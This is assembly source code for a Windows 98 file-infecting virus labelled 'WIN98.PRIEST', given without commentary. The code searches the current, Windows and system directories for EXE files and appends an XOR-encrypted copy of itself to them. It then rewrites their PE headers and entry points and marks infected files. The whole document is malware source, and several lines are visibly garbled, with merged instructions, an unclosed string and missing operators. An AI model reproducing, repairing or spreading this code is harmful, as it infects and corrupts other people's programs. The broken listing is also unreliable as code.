Win98.priest
.386
.MODEL FLAT
EXTRN EXITPROCESS: PROC
Ker32 EQU 0BFF70000H
Limit Equ 0000h
AddName EQU 0004H
AddFun EQU 0008H
Addord Equ 000ch
Create EQU 0010H
Close Equ 0014H
RFile EQU 0018H
FFIND EQU 001CH
NFIND EQU 0020H
White EQU 0024H
FPOIN EQU 0028H
Getw EQU 002ch
Gets Equ 0030H
Getc EQU 0034H
SRCHC EQU 0038H
Getp EQU 003ch
Shand Equ 0040h
Fhand Equ 0044H
Reads equ 0048h
Oldedi EQU 004ch
Chkif Equ 0050H
CHKDI EQU 0054H
Wichi EQU 0058H
ExEw Equ 005ch
DataA EQU 0200H
HEADS EQU 0300H
.code
START_VIRUS:
Call delta_offset
DELTA_OFFSET:
POP EBP
Sub EBP, Offset Delta_offset
Pushhad
Key_code:
MOV EAX, 00H
Lea ESI, [Virus_Body EBP]
MOV ECX, END_VIRUS - VIRUS_BODY -4
Keycode:
XOR DWORD PTR [ESI], EAX
Add ESI, 1
Xchg Al, AH
Ror Eax, 1
Loop keycode
Virus_body:
Popad
Push EAX
MOV EAX, [Oldip EBP]
Add Eax, 400000H
Push EAX
Call scan_data
Mov EDI, ESI
Add ESI, 6
CMP Word PTR [ESI], 0
JE r_ip
XOR ECX, ECX
MOV CX, [ESI]
Add ESI, 0F2H
Add ESI, 24h
Add EDI, 0F8H
CHK_SE:
MOV EAX, [ESI]
And Eax, 0C0000000H
CMP EAX, 0C00000H
JNE next_se
Mov Eax, [EDI 8h]
MOV EBX, 511
Add Eax, EBX
XOR EDX, EDX
Inc EBX
Div EBX
Mul EBX
Sub Eax, [EDI 10h]
CMP EAX, 700H (W_ENC_END - W_ENC)
JGE OK_SE
Next_se:
Add ESI, 28H
Add Edi, 28h
Loop chk_se
JMP R_IP
OK_SE:
MOV ESI, [EDI 0CH]
Add ESI, [EDI 10h]
Add ESI, 400000H
MOV EBP, ESI
XOR EAX, EAX
MOV ESI, KER32 3CH
Lodsw
Add Eax, Ker32
CMP DWORD PTR [EAX], 00004550H
JNE R_IP
MOV ESI, [EAX 78H]
Add ESI, 24
Add ESI, KER32
Lodsd
Add Eax, Ker32
MOV [EBP LIMIT], EAX
Lodsd
Add Eax, Ker32
MOV [EBP AddFun], EAX
Lodsd
Add Eax, Ker32
MOV [EBP AddName], EAX
Lodsd
Add Eax, Ker32
MOV [EBP Addord], EAX
POP EAX
POP EBXPUSH EBX
Push EAX
MOV ESI, EBX
Add ESI, Offset GP - START_VIRUS
MOV EBX, ESI
MOV EDI, [EBP AddName]
Mov Edi, [EDI]
Add Edi, Ker32
XOR ECX, ECX
Call find_src
SHL ECX, 1
MOV ESI, [EBP Addord]
Add ESI, ECX
XOR EAX, EAX
MOV AX, Word PTR [ESI]
SHL EAX, 2
MOV ESI, [EBP AddFun]
Add ESI, ESI
Mov Edi, [ESI]
Add Edi, Ker32
MOV [getp ebp], EDI
Mov EBX, CREATE
POP EAX
POP EDI
Push EDI
Push EAX
Add Edi, Offset CF - Start_Virus
Find_fun:
Push EDI
Push ke32
Call [getp ebp]
MOV [EBX EBP], EAX
Add ebx, 4
CMP EBX, GETP
JE OK_FIND_FILE
MOV Al, 0
Repne scaSB
JMP Find_Fun
OK_FIND_FILE:
Lea EAX, [EBP EXEW]
Push EAX
Push 100H - 58H
Call [Getc EBP]
OR EAX, EAX
JE chG_DIR
OK_EXE:
Lea ESI, [EBP DATAA]
PUSH ESI
Lea EDI, [EBP EXEW]
Push EDI
Scan_dir:
CMP Byte Ptr [EDI], 00H
JE OK_MAKE_EXE
Add EDI, 1
JMP scan_dir
OK_MAKE_EXE:
Mov al, ''
Stosb
MOV DWORD PTR [EBP WICHI], EDI
MOV AX, '. *'
Stosw
Mov Eax, 'EXE'
Stosd
Call [EBP FFIND]
MOV [EBP SHAND], EAX
CMP EAX, -1
JE r_ip
MOV EAX, 0
Open_file:
CMP BYTE PTR [EBP DATAA 2CH EAX], 'V'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'N'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'V'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 'N'
Je next_file
CMP BYTE PTR [EBP DATAA 2CH EAX], 0
JE OPEN_FILE_START
Add Eax, 1
JMP Open_FILE
Open_FILE_START:
MOV EDI, DWORD PTR [EBP WICHI]
MOV ECX, 20
Lea ESI, [EBP DATAA 2CH]
Repz Movsb
PUSH 0
PUSH 0
Push 3
PUSH 0
PUSH 0
Push 0C0000000H
Lea EAX, [EBP EXEW]
Push EAX
Call [EBP CREATE]
MOV [EBP FHAND], EAX
CMP EAX, -1
Je file_close
MOV ECX, 400H
Lea Edx, [EBP Heads]
Lea Eax, [EBP READS]
PUSH 0
Push EAX
Push ECX
Push Edx
Push DWORD PTR [EBP FHAND]
Call [EBP RFILE]
CMP EAX, 0
Je file_close
CMP Word PTR [EBP Heads], 'ZM'
JNE File_Close
XOR EAX, EAX
Lea ESI, [EBP HEADS 3CH]
Lodsw
Add Eax, EBP
Add eax, Heads
Mov ESI, EAX
Lea EBX, [EBP HEADS 400H]
CMP EAX, EBX
JG file_close
CMP Word PTR [EAX], 'EP'
JNE File_Close
CMP DWORD PTR [EAX 34H], 400000H
JNE File_Close
CMP Word PTR [EBP Heads 12h], '^^'
Je file_close
CMP Word PTR [ESI 6], 6
JG file_close
XOR ECX, ECX
Mov EDI, ESI
MOV CX, Word PTR [ESI 6]
Add EDI, 0F8H
CHK_DATA:
Add EDI, 24h
MOV EAX, DWORD PTR [EDI]
And Eax, 0C0000000H
CMP EAX, 0C00000H
JE OK_INFECT
Add Edi, 4H
Loop chk_data
JMP file_close
OK_INFECT:
MOV EAX, [EBP DATAA 20H]
Call F_seek
Mov EDI, [ESI 28H]
POP EBX
POP EAX
Push EAX
Push EBX
Add Eax, Offset Oldip - Start_Virus
Mov DWORD PTR [EAX], EDI
MOV EAX, Offset End_virus - Start_Virus
MOV ECX, [ESI 3CH]
Add Eax, ECX
XOR EDX, EDX
Div ECX
Mul ECX
Add DWORD PTR [ESI 50H], EAX
MOV ECX, EAX
POP EAX
POP EBX
MOV EDX, EBX
Push EBX
Push EAX
Push ECX
Push ECX
MOV ECX, END_VIRUS - START_VIRUS
Pushhad
Push Edx
Add Edx, Offset W_ENC - START_VIRUS
MOV ESI, EDX
Lea EBP, [EBP HEADS]
Add ebp, 400h
MOV EDI, EBP
Push EDI
MOV CX, OFFSET W_ENC_END - W_ENC
Repz Movsb
POP EDI
JMP EDI
r_body:
Popad
POP ECX
Sub ECX, Offset End_virus - Start_virus
Mov EDX, 400000H
Call fwrite
MOV EAX, [EBP DATAA 20H]
MOV ECX, [ESI 3CH]
Mov EDX, 0
Div ECX
Push Edx
Push EAX
Mov EDI, ESI
MOV AX, Word PTR [ESI 6]
SUB EAX, 1
MOV ECX, 28h
Mul ECX
Add Eax, 0F8H
Add Edi, EAX
XOR EDX, EDXMOV EAX, [EDI 14H]
MOV ECX, [ESI 3CH]
Div ECX
POP EDX
Sub EDX, EAX
Push Edx
Mov Eax, [EDI 10h]
SUB EAX, 1
Add Eax, ECX
XOR EDX, EDX
Div ECX
MOV EBX, EAX
POP EAX
Sub Eax, EBX
Mul ECX
POP EDX
Add Eax, EDX
Add DWORD PTR [ESI 50H], EAX
MOV EBX, [EDI 0CH]
Add EBX, [EDI 10h]
Add Ebx, EAX
MOV [ESI 28H], EBX
POP EBX
Add Ebx, EAX
Add [EDI 8h], EBX
Add [EDI 10H], EBX
MOV [EDI 24H], 0C0000040H
MOV Word PTR [EBP Heads 12H], '^^'
MOV EAX, 0
Call F_seek
Lea Edx, [EBP Heads]
MOV ECX, 400H
Call fwrite
Inc DWORD PTR ChKIF [EBP]
FILE_CLOSE:
Push DWORD PTR [EBP FHAND]
Call [EBP Close]
CMP DWORD PTR Chkif [EBP], 6
JE chG_DIR
Next_file:
Lea Eax, [EBP DATAA]
Push EAX
Push DWORD PTR [EBP SHAND]
Call [EBP NFIND]
CMP EAX, 0
JE chG_DIR
JMP Open_FILE
CHG_DIR:
Push DWORD PTR [Shand EBP]
Call [EBP SRCHC]
CMP DWORD PTR Chkif [EBP], 6
JE r_ip
CMP DWORD PTR CHKDI [EBP], 1
Jg chg_dir_2
Add DWORD PTR CHKDI [EBP], 2
PUSH 100H-58H
Lea EAX, [EBP EXEW]
Push EAX
Call [EBP GETW]
OR EAX, EAX
JE CHG_DIR_2
JMP OK_EXE
CHG_DIR_2:
CMP DWORD PTR CHKDI [EBP], 2
JG R_IP
Add DWORD PTR CHKDI [EBP], 1
PUSH 100H-58H
Lea EAX, [EBP EXEW]
Push EAX
Call [EBP GETS]
OR EAX, EAX
JE r_ip
JMP OK_EXE
Scan_data:
MOV ESI, 400000H
MOV CX, 600H
SCAN_PE:
CMP DWORD PTR [ESI], 00004550H
Je r_co
Inc ESI
Loop scan_pe
R_ip:
POP EAX
POP EBX
JMP EAX
R_CO:
RET
Find_src:
MOV ESI, EBX
X_m:
CMPSB
JNE FIND_SRC_2
CMP Byte Ptr [EDI], 0
Je r_co
JMP X_M
Find_src_2:
INC CX
CMP CX, [EBP LIMIT]
JGE NOT_SRC
Add DWORD PTR [EBP AddName], 4
MOV EDI, [EBP AddName]
Mov Edi, [EDI]
Add Edi, Ker32
JMP Find_SRC
NOT_SRC:
POP ESI
JMP R_IP
F_seek:
PUSH 0
PUSH 0
Push EAX
Push DWORD PTR [EBP FHAND]
Call [EBP fpoin]
RET
W_enc:
IN Al, 40h
Xchg Al, AH
IN Al, 40h
Add Eax, EDI
Add Edi, Offset Encry_e - W_ENC 1
Mov DWORD PTR [EDI], EAX
POP EDX
Add Edx, Offset Key_code - Start_virus 1
Mov DWORD PTR [EDX], EAX
Popad
Pushhad
MOV ESI, EDX
Add ESI, Offset Virus_Body - Start_Virus
MOV ECX, Offset End_virus - Virus_Body -4
Call encry_e
Popad
Pushhad
Call fwrite
Popad
Pushhad
MOV ESI, EDX
Add ESI, Offset Virus_Body - Start_Virus
MOV ECX, Offset End_virus - Virus_Body -4
Call encry_e
Popad
Pushhad
Add Edx, Offset R_Body - START_VIRUS
JMP EDX
ENCRY_E:
MOV EAX, 00H
ENCRY:
XOR DWORD PTR [ESI], EAX
Xchg Al, AH
Ror Eax, 1
Inc ESI
Loop encry
RET
FWRITE:
PUSH 0
Lea Eax, [EBP READS]
Push EAX
Push ECX
Push Edx
Push DWORD PTR [EBP FHAND]
Call [EBP White]
RET
W_ENC_END:
CF DB 'CreateFilea', 0
CL DB '_LClose', 0
RF DB 'Readfile', 0
FF DB 'FINDFIRSTFILEA', 0
Fn DB 'FINDNEXTFILEA', 0
WF DB 'WRITEFILE', 0
sf db 'setfilepointer', 0
GW DB 'getWindowsDirectorya', 0
GS DB 'GetSystemDirectorya', 0
GC DB 'getcurrentdirectorya, 0
FC DB 'FindClose', 0
GP DB 'getProcaddress', 0
VN DB 'WIN98.PRIEST'
DB 'SVS / COREA / MOV'
Oldip DD F_END - 400000H
END_VIRUS:
F_end:
PUSH 0
Call EXITPROCESS
End start_virus
